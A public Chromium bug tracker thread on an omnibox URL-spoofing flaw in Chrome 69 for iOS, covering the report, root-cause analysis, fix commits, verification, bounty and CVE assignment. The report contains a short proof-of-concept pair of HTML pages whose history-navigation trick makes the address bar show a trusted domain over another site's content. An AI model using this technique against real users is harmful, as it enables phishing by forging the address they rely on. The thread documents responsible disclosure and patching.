New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Verified
Owner:
Closed: Sep 25
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: iOS
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 887273: Security:Chrome URL Spoofing in Omnibox

Reported by xis...@gmail.com, Sep 20

Issue description

VULNERABILITY DETAILS
Chrome URL Spoofing in Omnibox

VERSION
Chrome Version: 69.0.3497.91+[Stable]
Operating System: [iOS]

REPRODUCTION CASE

(1)Access https://xisigr.com/test/spoof/chrome/url_009.html
(2)Click on the "Click me" button.
(3)Address bar says https://xisigr.com - this is NOT https://xisigr.com.


google site: 
https://xisigr.com/test/spoof/chrome/url_009.html

=======url_009.html=======
<script>
function aa(){
location.replace('http://spoof.fish/test/spoof/chrome/e.html');
}
</script>
<button onclick="aa()">Click me</button>
=======url_009.html=======


evil site:
http://spoof.fish/test/spoof/chrome/e.html

=======e.html=======
<h1>Address bar says https://xisigr.com - this is NOT https://xisigr.com</h1>
<button onclick="alert(document.domain)">haaaaa</button>
<script>
window.history.go(1);
window.history.go(-1);
</script>
=======e.html=======
 

Comment 1 Deleted

Comment 2 by mbarbe...@chromium.org, Sep 21

Components: UI>Browser>Navigation
Labels: Security_Severity-High Security_Impact-Stable OS-iOS
Owner: eugene...@chromium.org
Status: Assigned (was: Unconfirmed)
eugenebut: Are you the right owner for this? Feel free to reassign it if you know of anyone else who might be, or assign it back to me if not.

Comment 3 by sheriffbot@chromium.org, Sep 22

Project Member
Labels: M-69 Target-69

Comment 4 by sheriffbot@chromium.org, Sep 22

Project Member
Labels: Pri-1

Comment 5 by eugene...@chromium.org, Sep 24

Thank you for the bugreport.

http://spoof.fish/test/spoof/chrome/e.html does not load
I tried reproducing the bug with attached html example (M69 stable and trunk code), but the URL does not spoof. 
Could you please provide working POC for this bug. Thanks!

Comment 6 Deleted

Comment 7 Deleted

Comment 8 by eugene...@chromium.org, Sep 25

Cc: danyao@chromium.org
Labels: -M-69 -Target-69 ReleaseBlock-Stable M-70
Thanks for updating POC. I was able to reproduce the problem. Here is what happens:

 - xisigr.com calls replaceState("http://xn--lwcc.com")
 - replace state creates a new navigation item (known bug)
 - old navigation item (xisigr.com) stays associated with WKBackForwardListItem whose state was replaced
 - at this point navigation manager's state is incorrect
 - http://xn--lwcc.com performs renderer-initiated back navigation 
 - chrome loads associated WKBackForwardListItem for xisigr.com
 - no actual navigation happens, but committed navigation item is now xisigr.com

I don't see UXSS here, but rather a URL spoofing. User sees http://xn--lwcc.com, but URL says xisigr.com

Comment 9 by bugdroid1@chromium.org, Sep 25

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/b312df8d9b00ca26046d1fe442ee19dc9780fcfe

commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe
Author: Eugene But <eugenebut@chromium.org>
Date: Tue Sep 25 17:46:54 2018

Invalidate associated WKBackForwardListItem after replace state.

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/heads/master@{#593992}
[modify] https://crrev.com/b312df8d9b00ca26046d1fe442ee19dc9780fcfe/ios/web/web_state/ui/crw_web_controller.mm

Comment 10 by eugene...@chromium.org, Sep 25

Cc: srikanthg@chromium.org kariahda@chromium.org
Labels: Merge-Request-70
Status: Fixed (was: Assigned)
Requesting approval. Will merge after canary verification.

Comment 11 by sheriffbot@chromium.org, Sep 25

Project Member
Labels: -Merge-Request-70 Merge-Review-70 Hotlist-Merge-Review
This bug requires manual review: Less than 17 days to go before AppStore submit on M70
Please contact the milestone owner if you have questions.
Owners: benmason@(Android), kariahda@(iOS), geohsu@(ChromeOS), abdulsyed@(Desktop)

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 12 by sheriffbot@chromium.org, Sep 26

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 13 by kariahda@chromium.org, Sep 27

Let me know when you've gotten verification.

Comment 14 by srikanthg@chromium.org, Sep 27

Status: Verified (was: Fixed)
Verified on iPhoneX, iPhone5s M71.0.3563.0 canary
iOS 12.1 beta, iOS11.4.1

URL is now matched with the content area.

Comment 15 by kariahda@chromium.org, Sep 27

Labels: -Hotlist-Merge-Review -Merge-Review-70 Merge-Approved-70
Approved.

Comment 16 by bugdroid1@chromium.org, Sep 27

Project Member
Labels: -merge-approved-70 merge-merged-3538
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/230373aaa4d64aed8e01832de10fe7e74457f63b

commit 230373aaa4d64aed8e01832de10fe7e74457f63b
Author: Eugene But <eugenebut@google.com>
Date: Thu Sep 27 21:10:06 2018

Invalidate associated WKBackForwardListItem after replace state.

TBR=eugenebut@chromium.org

(cherry picked from commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe)

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#593992}
Reviewed-on: https://chromium-review.googlesource.com/1249819
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/branch-heads/3538@{#717}
Cr-Branched-From: 79f7c91a2b2a2932cd447fa6f865cb6662fa8fa6-refs/heads/master@{#587811}
[modify] https://crrev.com/230373aaa4d64aed8e01832de10fe7e74457f63b/ios/web/web_state/ui/crw_web_controller.mm

Comment 17 by cr-audit...@appspot.gserviceaccount.com, Sep 27

Project Member
Labels: Merge-Merged-70-3538
The following revision refers to this bug: 
https://chromium.googlesource.com/chromium/src.git/+/230373aaa4d64aed8e01832de10fe7e74457f63b

Commit: 230373aaa4d64aed8e01832de10fe7e74457f63b
Author: eugenebut@google.com
Commiter: eugenebut@chromium.org
Date: 2018-09-27 21:10:06 +0000 UTC

Invalidate associated WKBackForwardListItem after replace state.

TBR=eugenebut@chromium.org

(cherry picked from commit b312df8d9b00ca26046d1fe442ee19dc9780fcfe)

Bug:  887273 
Cq-Include-Trybots: luci.chromium.try:ios-simulator-cronet;luci.chromium.try:ios-simulator-full-configs
Change-Id: I99e171f64a20c7dba9f8984d05cb509b00d01ea5
Reviewed-on: https://chromium-review.googlesource.com/1243166
Reviewed-by: Danyao Wang <danyao@chromium.org>
Commit-Queue: Eugene But <eugenebut@chromium.org>
Cr-Original-Commit-Position: refs/heads/master@{#593992}
Reviewed-on: https://chromium-review.googlesource.com/1249819
Reviewed-by: Eugene But <eugenebut@chromium.org>
Cr-Commit-Position: refs/branch-heads/3538@{#717}
Cr-Branched-From: 79f7c91a2b2a2932cd447fa6f865cb6662fa8fa6-refs/heads/master@{#587811}

Comment 18 by awhalley@chromium.org, Oct 1

Labels: reward-topanel

Comment 19 by awhalley@google.com, Oct 2

Labels: -ReleaseBlock-Stable

Comment 20 by awhalley@chromium.org, Oct 4

Labels: -reward-topanel reward-unpaid reward-3000
*** Boilerplate reminders! ***
Please do NOT publicly disclose details until a fix has been released to all our users. Early public disclosure may cancel the provisional reward. Also, please be considerate about disclosure when the bug affects a core library that may be used by other products. Please do NOT share this information with third parties who are not directly involved in fixing the bug. Doing so may cancel the provisional reward. Please be honest if you have already disclosed anything publicly or to third parties. Lastly, we understand that some of you are not interested in money. We offer the option to donate your reward to an eligible charity. If you prefer this option, let us know and we will also match your donation - subject to our discretion. Any rewards that are unclaimed after 12 months will be donated to a charity of our choosing.
*********************************

Comment 21 by awhalley@google.com, Oct 4

Nice one xisigr@! The panel awarded $3,000 for this report!

Comment 22 by awhalley@chromium.org, Oct 4

Labels: -reward-unpaid reward-inprocess

Comment 23 by awhalley@google.com, Oct 15

Labels: Release-0-M70

Comment 24 by awhalley@chromium.org, Oct 16

Labels: CVE-2018-17464 CVE_description-missing

Comment 25 by awhalley@chromium.org, Nov 12

Labels: -CVE_description-missing CVE_description-submitted

Comment 26 by sheriffbot@chromium.org, Jan 2

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment